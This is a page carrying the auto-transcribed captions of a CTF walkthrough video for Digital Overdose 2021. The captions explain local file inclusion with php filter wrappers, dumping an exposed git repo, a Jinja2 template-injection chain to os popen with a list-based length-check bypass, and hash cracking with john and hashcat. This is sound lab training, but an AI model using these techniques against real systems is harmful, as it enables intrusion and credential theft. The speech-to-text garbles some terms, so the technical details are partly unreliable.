Web Challenge Walkthroughs - Digital Overdose CTF 2021

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
in this video we're going to take a look at some of the web challenges from the digital overdose 2021 ctf and we'll start for the easiest challenge which is called not required the description says hello i'm teamsloverboy33 i made a php website can you do a quick security check on it so we've got the site already to connect to let's open it up and we go through to the site we see hello and we basically got the same message there we can see here it's actually loading the file index.html we could have a look at the source here just to see if there's anything hidden any comments or anything but it doesn't look like it so this is loading index.html the first thing i would try to do here is see if we can access well let's try just flagged first of all and we get this message saying require flag fail to open stream no such directory so this is the classic local file inclusion vulnerability so they're including a file and they're allowing the user to supply the name of that file so if we were to go and say move back a directory and try and open flag and you can see it's actually trying it's going to keep going back a directory each time we do that in fact what we can do here as well let's go ahead and let me just try etc password all right yeah so even without the moving through the directories we're able to just include etc password there um it doesn't give us any hint as to what the flag might be so we could go around and keep trying to kind of look for the flag um in flag related file names what i did here was to have a look at some filter tricks let me look for lfi filter cheat sheet and i think hack tricks is down at the moment let me open high on coffee yeah it's down at the moment so we'll not be able to use that during this video but if you're going to have a look at the high on coffee cheat sheet here we'll see that there's some different wrappers that we can use to actually try to load php code and in this case we're likely to want to see what's inside this index.php file um so let's see what we can do here we have the php input we have this php filter let me try and include this so i'm going to take a copy of that and we'll say the file is equal to this so it's going to try to convert it into base64 and in that and then we'll be able to base64 decode the index.php hopefully to get the originating source code so yeah we've got a base64 encoded value which looks good let's go ahead and do echo at base64-d we get our source code here and you can see that there's a note left in the php file saying delete bin secrets.txt so now we've got a location of a file called secret.txt we can go ahead and just include this using our lfi vulnerability we do that and we get back our flag the next challenge is called git commit m whatever and we don't have a description we've just got this site to connect to so let's open up and take a look we open that up and we'll see a message saying if only you could see the source code with what looks like some kind of base64 encoded strings so i'm going to take a copy of that let's view the source just to see if there's any comments or anything in there which there isn't and let's go and try and base64 decode this so we can echo it again get rid of that space and base64-d and we don't get anything recognizable here so we'll move on we know that the description of the challenge says uh well it's related to a get uh message so let's try and just see if we can load dot get oh and we get forbidden you don't have access permission to access this resource so we could go and make sure that's not just a generic message we're getting if we try and put in a different a typo here you'll see we get not found so the git repo is found we just don't have permission to access it so we might want to try and just just try it out anyway see if we can clone the repo which we can't it's not found we can go and have a look to see if we can access the config here let's do config which we can we can get the config so if we can go through we could we could brute force this basically with a with goalbuster or your directory busting tool of choice f or something like that um let's see if we can have a look at so let's do logs refs heads master and you can see here we have this commit uh initial commit commit a security suicide and we can see that it was committed by eliot mac user um so what we're going to do here is go and have a look at a tool called get dumper which we should be able to use to dump the repo and i guess this is going to work a little bit uh pretty much the same as if we were to um the brute force and the directories but it knows what to look for in terms of the directory structure and typical um file names or commit names stuff like that um so let's install this we can just do pip install so i'm gonna do pip install get dumper and then to run it we just need to run git dumper our options and then the url and directory so let's create a new directory and we'll do git dumper and grab the url close down paste that in we'll do dot git i'm not sure if it's required but provide that and then the new directory as well we run that you can see yes fetching all these objects um we have our whole git directory there let's go and take a look at it and let me jump into the git first of all so we can actually see the full structure here we could have a look with tree and see what's in each of these directories we could try and grep for things so we might want to grep for let's do recursive um not case sensitive and we could try and grab for flag in here nothing why don't we try and grep for curly brace okay so it's found in these binary files but that's not too good let's do do digital overflow and we're not getting anything so if we go back we could go and start having a look through some of these but um if we go back we'll actually see that git repo already has some stuff in it here so for example we have our index.php file so why don't we take a look at index.php and try and find out what's inside it because obviously you're not able to view the source code through the website itself and if we do that we'll see that we've got a decrypt function let me zoom in a bit too much we have an encrypt function and a decrypt function create encryption key and we can basically see that the index.php file so whenever opening up this website what it's actually doing is it's using this private key it's grabbing the file contents of flag so it's loading the flag and then it's going to encrypt the flag with this private key and then it's going to echo that out so what we actually have here is our flag which has been encrypted so why don't we go and just modify this code let's say that our flag we're not loading it from the file it's this right here it's like um value that we've just grabbed and we've already got a private key so why don't we just try and change this to decrypt and we're decrypting the flag with the private key that looks pretty good to me but i'm missing a semicolon and then it's just going to echo this out which again looks good let's try and run php index.php we get a message saying call to undefined functions so let's go and google that and see what it's about not enabled by default please refer to this for installation or we can do this so sudo apt-get install mbstring um what i'm gonna do probably using a different php version so let me do php dash dash version we're using 7.4 so we'll do sudo apt get install php 7.4 and then let's paste in that mb string it's going to run through that and install it and let's try and run phpindex.php again and this time we get back our flags which decrypted the flag using that encrypted flag value and the private key and it's returned our result the next challenge is called mad lib and the description says i just created the first draft of my first last project a mad lib generator that fills the given words into a mad lib template try it out and let me know what you think the character length limit should make this app pretty secure so we've got this server and port number to connect to we're going to open that up and we'll see that we've got this form asking us to pick our words let's just try and put in some values here and see how it responds to different data types um we might want to try and insert a script as well and if we submit that we'll get a message saying that it must not be longer than 21 characters let's take out our script and just put something else in here we submit that and then this all comes back with our values been inserted into this string we could have a look at the source here the html but there's really not too much for us to look at and we've been given the source code for the server side so let's actually just open that up and take a look i'm going to copy this over to codium and let's just step through the source code a bit before we look into the vulnerability so we can see here that it's important from flask we've got flask render template string request and send from directory if the website is loaded on the home page here it's going to just call send from directory and send us the index.html rendered as html but if we make a post request to madlib then it's going to check to make sure the request.json is five so it's going to make sure that we've inserted five json objects here it's calling request json.get on each one of those which we just saw it do it's going to then make sure that the length of each one of these values that we've entered is less than 21 characters 21 characters or less and if it is it's going to basically take each of the values that we've put in and it's going to put them into these curly braces here in the text and then it's going to call render template string with the mad lib if we try and insert more than five words you can see it's going to come back and say the mad lib only takes five words so let's actually just jump over to burp suite we'll see this post request that we made to mad lib i'm gonna send that to the repeater and if we then try and insert another one here let's try and put in here uh hacked and then we'll say that's equal to just something else send that off and then this time we get the mad lib only takes five words so that's basically what it was talking about in that case so um i'm going to open up let's search here for ss ti server side template injection and this is a really great article by james kettle um going through server side template injection let's just jump through i'm going to open up a cheat sheet as well normally go to hat tricks it's down at the moment but this is a really good cheat sheet as well just for going through and trying to find some commands to throw at um their site so i would really recommend going through this whole article but let me just cover a little bit of it template engines are widely used by web applications to present dynamic data via web pages and emails and safely embedding user input and templates enables server-side template injection a frequently critical vulnerability that's easy to mistake for cross-site scripting or miss entirely unlike cross-site scripting template injection can be used to directly attack web servers internals and often obtain rce remote code execution turning every vulnerable application into a potential pivot point template injection can arise both through developer error and through intentional exposure of templates in an attempt to offer rich functionality as is commonly done by wikis blogs etc internal template injection is such a common use case that many template engines offer a sandboxed mode for this expressed purpose this paper defines a methodology for detecting and exploiting template injection and shows it being applied to craft rce zero days for two widely deployed enterprise web applications generic exploits are demonstrated for five of the most popular template engines including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way so it has some links to the web up to the talk that was done at black cat usa as well as white paper and then we can basically go to this introduction it goes through some different templating engines how to identify what template and engine is used so for example we have um an example here let's go and throw this into our web application and you'll see that it's come back with 49 so it's actually interpreted this and what we can do is if we add some quotes here and submit that the fact that we've got back seven seven seven and we've got back seven sevens shows that this is ginger two um as the template in engine so if that would have come back with 49 i think it would have been maybe twig or something like that but you can basically go through some cheat sheets throw in some different commands in here and try and find out what it comes back with and from there identify what the template and engine is in some cases maybe you'll get an error which will just kind of spit out the template engine that's used and you see that we've tried to enter in self let's try and do self dot dict and submit that and this time we'll we'll be able to dump out this full dictionary of keys and values so let's take a copy of this where does it end it ends right here we'll take a copy of that we'll go and try and make this a bit easier to read so we can format this in a better json format and we can basically go and have a look through some of the functions we might be able to access here so for example we have lipsum in there it's going to be no use at all to us we have this url4 we can access the config and potentially set things in the config as well let's go back here and just change this to config dots items and submit that let me get these back as well so we could go and add these to our json viewer if you want to go and have a look through some of that but the problem we're going to run into trying to build this up essentially if we go back over to our cheat sheet here and look at some of the examples that we might be trying to run through you see a lot of these commands that we'd be trying to enter are far too long we have a maximum of 21 characters per command so we're not going to be able to enter anything like this and in fact even trying to access things like this the class based subclasses is going to be too long for us so my team had some good ideas on how to approach this and in the end found an unintended solution which i think seems to be easier than the intended solution so let's run through some of the thinking and one of the first things which um i thought was a really good idea was to use the request url to try and extend the amount of space we have available here so for example if we were to pass in a request here and let's say this is longer than 21 chars so we see we're actually passing this in in the request and if we now say that we want to print out the request.url let's try and print that and print that out and we get this full url here but if we just wanted to access the string that was at the end of that we can basically go and find out how long is this part of the string or this part of the string and access the substring of it so we can say here now let's go back and change this to set so we can actually set this to let's say a equals request url and then in the next parameter we can use that variable which has just been set so we can say that we want to access say a and 34 onwards which is the size of the beginning of the url and if we submit that this time we don't get anything because we need our two curly braces on each side so this again this time we get this is longer than 21 charge so we're actually able to pass in the problem is this is a string so if we try to pass in something here as in the uh payloads that we were seeing over here if we're trying to pass in for example uh one of these strings here and then try to execute it it'll actually it'll still be a string inside this value um but we did have some things available to us here in the config we had and not in the config sorry in the self dot dict we had some things available including i can't see it now but we're cycling okay cyclo we've got cycler and we've got joiner and let me actually just go ssti i'm just going to go and open up another cheat sheet here jump down here to the you see here that if we were able to access a payload like this cycler.init.globals.os dot p open then we'd be able to get some kind of command execution so for example let's go back and try and set this to let's try and use the cycler so if we say here that we want to use a is equal to cycler and then we could say in our second value here we want to set b is equal to a dots in it let's go here and and the idea i think is to basically chain this together you can see here we've got our cycler in it the idea would be to chain this together so say if we continue with this process and try and say let me actually just take a copy of that and then do the same or next bit was globals and then os so we go here and say globals but we're going to run into the problem that this is greater than 21 characters so i was trying to set this let's say instead that that's just b is equal to globals and then in the next value we can say that say c is equal to a dot b and then maybe os and then you would like to hope towards the end we would be able to just say now that we want to access c dot p open and then say ls let's try and run that encountered an error dot read now it's greater than 21 characters so we could try and add our p open here maybe and then just say c dot or cls okay now this is greater than 21 characters so this was kind of the process of going through and trying to use variables to solve this to be honest at this point i hadn't really contributed too much towards solving the challenge this is mostly my teammates working on it but what i was thinking here is um could we bypass this length check in any way so this is checking is the length of each one of these values greater than 21 and if we're passing in a string obviously it's going to check is there more than 21 characters but what happens if we pass a list here instead so if i was to go back here and say um let's let's go and take a copy for example of this right here which is something like what we want to execute so if we send that off this is obviously greater than 21 characters but if we were to send this off and make sure this was inside a some square brackets it's now a list so what's the length of this now the length would be one because only one item in the list now we're still getting an error there but let's take out some of these other commands which might be causing some issues and we submit that again and this time you'll see that in the place of our verb we've actually got back our id so we can go back and say let's run ls and that comes back with the list of the files in the directory we can go ahead and say catflag.txt and then we get back our flag so this was the unintended solution we didn't actually make use of the five different placeholders we have here the intended solution i believe was to actually use the config and i think you can actually see if we go back to our um stack viewer here you can actually see that somebody else has assigned some variables so you can see that they've assigned os to bd they've assigned p open to be e and they're using the urls and stuff as well they've got in it they've got global so the idea really is to build these up in the config so they persist between each request and then you can call those from there but um it looks like the solution that we use there was quite a bit easier anyway but i look forward to seeing what kind of creative solutions some other people have come up with for this as well okay i know i said we were just going to focus on the web challenges in this week's video but uh these hash cracking challenges are nice and easy let's just run through a few of them so we've got some hashes to crack our first one let's run hash id to get an idea what type of hash it is most likely md2 or md5 according to this but we can take a copy of this we go to a couple of different sites let's actually we'll try out crack station generally a good one but i find that it's probably going to ask us to do a capture oh it didn't okay awesome uh we run that we get our first um flag back which is phantom lover let's go and have a look at the next one again hopefully we can just paste this in here leave that to crack we didn't even run hash id that time but let's do it and this time sha1 you can actually see it comes up here xiao1 this was fish and chips fish chips and let's go back to the third one we can run hash id and this time shaft 512 by the looks of it again let's just go and throw it in the crack station crack caches this time mama dobbins let's go back to our fourth hush hash id this time most likely sneferu256 or sha256 which sounds more likely to me but let's go and throw it in the crack station see if it knows what to do with it okay now it's now it wants me to start doing some image labeling crack cache this time we get not found okay so what i'm gonna do this time is let's create a file called hash let's paste that in there and i'm gonna run this with john so we can use john the ripper we'll do john dash dash word list what i really don't like here is if i put in equals it's not going to allow me to do our it's not going to allow me to do auto complete so i have to put in like a space here do use a share wordless hopefully it'll be in rock u we'll pass in hash as well let me go and get rid of the space and it's going to try and identify what type of hash it is and it's come back very quickly to say that hash was happy family so it detected hashtag ghost i guess that's what's what it was using yeah it used to use ghost but you have the option of specifying some of these others if you want to try those instead and now it's we've got the hash but we could run john show hash as well to get access to that again so that one was happy family let's go and have a look at the fifth one okay so this time we'll check the hash id again we've got some dollar signs in there which we need to escape so let me go and do that and this time we've got bluefish okay and what i'm going to do now is move over to hashcat because hashcats a lot quicker and particularly if i do it outside of the vm i'm going to go and have a look here hash cut example hashes and this is just a good place to go and find out what kind of mode we need to use here so in this case it was blowfish which we can see here is mode 3200 so bearing that in mind let me jump over to my windows system to my outside my vm and let's go and try this in hash cap so i'm over on the windows system here i've got the command prompt open and i've got the hashes in a file called hashes.hashes.txt so you can see here that's the hash but we could just pass this in as a string as well and now we're going to run hashcart.exe and we'll pass in that mode which is 3200 for blowfish and then we'll pass in the hashes so [Music] i should just type that in hashes hashes.txt we can also pass in the word list here as well so i've got a few word lists here we've got crack station we've got have in poland we've got rock u which we'll try rock you first of all um okay let me take out that w what's the wrong thing to put in and we'll run through that we can enter any key for status here so that'll give you an idea how long it's got to complete you can see here started one second it's got six hours to complete seven hours to complete and we can see that's finished it started at 53 minutes past it took less than two minutes to complete and we got back our password which was cowabunga so back over to our challenges let's go and have a look at the sixth hash and this time we have this very rand salt thing here let's um take a copy of this again let's use hash id let's set this to backslash so we can identify it md5 crypt okay let's go to our hash cut here let's search for md5 crypt and we'll see that it's mode 500 so i'm going to jump back over to the windows system and let's try it out okay so we're back over on the windows system we can have a look at the hashes again this has been updated with the new hash and we want to run then hashcarts.exe and this time the mode is 500 for md5 crypt and we're passion in the hashes and then we'll use the word list again rock u once through that we can hit s for status that one cracked very quickly it took five seconds and it found that the password was scotty banks okay and back over to the vm for the final challenge which is hash seven and this is quite a long one let's have a look at the hash id again get rid of all these dollar signs and there's only one possibility it's a sha 512 crypt so let's go and have a look at sha 512 oh five twelve let's see if we can just put encrypt yep it's one thousand eight hundred all right let's jump over to the window system and try it out and once again we can check the hashes see that we've got our updated hash in here and we want to run hashcat.exe the mode is 1800. the hashes are in hashes hashes.txt and the word list again will just be wordless rockview again we can hit status but before we can even hit status it's cracked um it started at 23 finished 26 so it took three seconds and identified that the hash was i get money and that wraps it up for the hash cracking challenges so i did solve a couple of other challenges in the ctf i'm gonna go and take a look at some more now as well but i want to try and limit these videos in terms of the amount of categories i'm running through in the walkthroughs just because it's quite time consuming going through and editing out all the audio issues and zooming in on text and things like that and i want to try and focus more on just kind of working on some of the challenges as well but um shout out to the team anyway and i hope you've enjoyed this video if you have any questions or comments any interesting solutions to any of the challenges that i demonstrated here or any of the challenges that i missed then do let me know
Info
Channel: CryptoCat
Views: 1,456
Rating: undefined out of 5
Keywords: digital overdose, capture the flag, CTF, web exploitation, bug bounty, LFI, SSTI, git dumper, git forensics, web hacking, jinja2, flask, hash cracking, hashcat, john the ripper, crackstation, writeup, tutorial, infosec, cybersecurity, wargames, DigitalOverdose, redteam, appsec, vulnerability analysis, burp suite, websec, portswigger, forensics, exploit, security, kali, parrot, hashid, pentesting, OSWE, walkthrough, madlib, xss, pwn, reversing, RFI, john hammond, liveoverflow, DOCTF, solve, hackathon, challenge, ctftime
Id: ssiWl8kzZwk
Channel Id: undefined
Length: 30min 8sec (1808 seconds)
Published: Mon Oct 11 2021
Related Videos
PHP include and bypass SSRF protection with two DNS A records - 33c3ctf list0r (web 400)
LiveOverflow
32K
DEADFACE Capture The Flag (CTF) 2021 - Challenge Walkthroughs [Beginner Friendly]
CryptoCat
2.7K
Day 1 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021 (beginner friendly)
CryptoCat
4.4K
recon ng full tutorial from noob to pro | #recong #fulltutorial
TECHYRICK
245
I bought 1000 meters of wire to settle a physics debate
AlphaPhoenix
333K
HomeLab Services Tour Late 2021 - What am I Self-Hosting in my HomeLab?
Techno Tim
70K
Day 3 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021
CryptoCat
1.1K
Web Challenges - HTB x Synack RedTeamFive Capture The Flag (CTF) 2021
CryptoCat
4.3K
Day 4 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021
CryptoCat
994
ZAP DeepDive: WebSockets
StackHawk
578
HackTheBox Cyber Apocalypse 2021 CTF - Web Challenge Walkthroughs
CryptoCat
3.5K
HOW TO MAKE A SUPER EXTENSION CORD! (Perfect for Christmas!)
Stud Pack
1.3M
Raspberry Pi OS Bullseye Update: New Features & Camera Issues
ExplainingComputers
88K
Google CTF: Beginner Quest: GATEKEEPER (Reverse Engineering)
John Hammond
31K
Springboard: the secret history of the first real smartphone (Full Documentary)
The Verge
594K
Angstrom CTF 2021 - Web Challenge Walkthroughs
CryptoCat
2.7K
Advent of Code Day 18
Neal Wu
3.3K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.